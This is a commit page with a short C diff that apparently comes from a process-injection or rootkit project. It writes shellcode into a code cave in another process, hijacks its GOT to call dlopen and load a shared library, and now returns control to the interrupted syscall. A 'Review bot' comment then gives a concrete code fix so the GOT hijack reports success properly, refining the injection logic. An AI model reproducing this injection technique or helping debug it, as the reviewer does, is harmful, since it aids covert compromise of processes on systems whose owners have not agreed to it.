Now control flow is redirected back to the syscall after running the shared library constructor instead of skipping it

This commit is contained in:
h3xduck
2022-04-09 14:17:09 -04:00
parent 036585371c
commit e881502ffa
11 changed files with 9928 additions and 9678 deletions


@@ -53,7 +53,7 @@ int manage_injection(const struct rb_event* event){
__u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
if(cave_addr!=0){
//Found valid cave.
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address)<0){
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address, event->syscall_address)<0){
printf("Continuing with next cave candidate. Some writes might have been performed already\n");
}
printf("Successfully hijacked GOT\n");
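Review bot: The return value of the new code_cave_write_shellcode call (the variant taking event->syscall_address) only selects the "Continuing with next cave candidate" message; control then falls through to `printf("Successfully hijacked GOT\n");`, so a failed write is still logged as a success and nothing in the hunk moves on to another candidate as the message claims. Keep the result and gate the success line on it, e.g. `int rc = code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address, event->syscall_address);` then `if (rc < 0) { printf("Continuing with next cave candidate. Some writes might have been performed already\n"); } else { printf("Successfully hijacked GOT\n"); }`. The existing failure message already concedes that some writes may have landed before the error; a short comment on `//Found valid cave.` stating that a failed write leaves the cave partially written (now including the syscall_address return stub) would make that state explicit to the reader. Whether the enclosing loop advances after the failure, and how syscall_address is validated before use, cannot be judged here because manage_injection begins and ends outside this hunk.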